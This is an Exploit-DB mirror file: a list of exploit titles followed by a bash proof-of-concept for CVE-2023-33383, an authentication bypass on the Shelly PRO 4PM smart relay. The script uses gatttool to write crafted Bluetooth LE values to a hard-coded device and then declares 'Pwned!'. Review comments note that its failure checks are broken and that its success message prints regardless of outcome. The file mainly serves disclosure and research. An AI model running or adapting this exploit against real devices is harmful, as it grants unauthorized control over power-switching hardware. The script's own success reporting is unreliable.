exploit-db-mirror/exploits/hardware/remote/51657.txt

ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)

Shelly PRO 4PM v0.11.0 - Authentication Bypass

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

Academy LMS 6.0 - Reflected XSS

Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

JLex GuestBook 1.6.4 - Reflected XSS

Joomla JLex Review 6.0.1 - Reflected XSS

News Portal v4.0 - SQL Injection (Unauthorized)

PHPJabbers Cleaning Business 1.0 - Reflected XSS

PHPJabbers Night Club Booking 1.0 - Reflected XSS
PHPJabbers Rental Property Booking 2.0 - Reflected XSS
PHPJabbers Service Booking Script 1.0 - Reflected XSS
PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS

PHPJabbers Taxi Booking 2.0 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

Webutler v3.2 - Remote Code Execution (RCE)
WordPress adivaha Travel Plugin 2.3 - Reflected XSS
WordPress adivaha Travel Plugin 2.3 - SQL Injection
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)

#!/bin/bash
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383
# Global settings for the rest of the script.
# Word-splitting is disabled for the whole script: IFS is set to the empty string.
IFS=''
# NOTE: `$false` is not defined anywhere in the visible file, so this expands to
# the empty string; `failed` is therefore initialised empty.
failed=$false
# ANSI colour sequences, stored as literal backslash escapes (single quotes keep
# the backslash); they are only rendered later via `echo -e`.
ENDCOLOR='\e[0m'
WHITE='\e[97m'
GREEN='\e[92m'
RED='\e[31m'
# Literal gatttool error text. NOTE(review): not referenced anywhere in the
# visible script.
substring='Connection refused'
#######################################
# Clear the terminal and print the coloured banner plus the key prompt.
# Globals:   GREEN, RED, ENDCOLOR (read; rendered through `echo -e`)
# Arguments: none
# Outputs:   banner lines to stdout
# Returns:   status of the last echo (0)
#######################################
banner()
{
  local line
  clear
  for line in \
    "${GREEN}[+]*********************************************************[+]" \
    "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" \
    "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" \
    "${GREEN}| CVE: CVE-2023-33383 |" \
    "${GREEN}[+]*********************************************************[+]" \
    "${GREEN}[Enter key to send payload]${ENDCOLOR}"
  do
    echo -e "$line"
  done
}
# ---- Main flow (flat top-level script) ----
# Show the banner, then wait for one keypress (silent, no echo to the terminal).
banner
read -s -n 1 key
# 'x' aborts. Enter yields an empty key (-n 1 stops at the newline delimiter) and
# proceeds. Any other key matches neither branch and the script simply ends.
if [ "$key" = "x" ]; then
exit 0;
elif [ "$key" = "" ]; then
# Reachability probe: list primary GATT services of the hard-coded BLE address,
# bounded to 5 s by `timeout`. gatttool is run via sudo. Empty output is treated
# as a timeout; no other failure mode is distinguished.
gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
if [ -z "$gattout" ]; then
echo -e "${RED}Connection timed out${ENDCOLOR}"
exit 0;
else
# Write value 00000001 to handle 0x000d; gatttool stdout/stderr are discarded,
# so its exit status is the only signal and it is not captured here.
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
sleep 1
# NOTE: $? here is the exit status of the preceding `sleep 1`, not of gatttool,
# so this test does not reflect whether the write above succeeded.
if [ $? -eq 1 ]; then
# NOTE: $failed and $true both expand to empty, so this word becomes the bare
# command `=` (command not found) rather than an assignment to `failed`.
$failed=$true
exit 0;
fi
# Write value ab to handle 0x0008, output discarded as above.
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
sleep 1
# Same caveat as above: $? is the status of `sleep 1`, not of gatttool.
if [ $? -eq 1 ]; then
# Same caveat: expands to the bare command `=`, not an assignment.
$failed=$true
echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
exit 0;
else
# Write value abcd to handle 0x0008, print five progress dots over ~5 s, then
# report success. Nothing here verifies the device's state: the final message is
# printed unconditionally once this branch is reached.
sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
sleep 1
for i in {1..5}
do
echo -ne "${GREEN}."
sleep 1
done
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
fi
fi
fi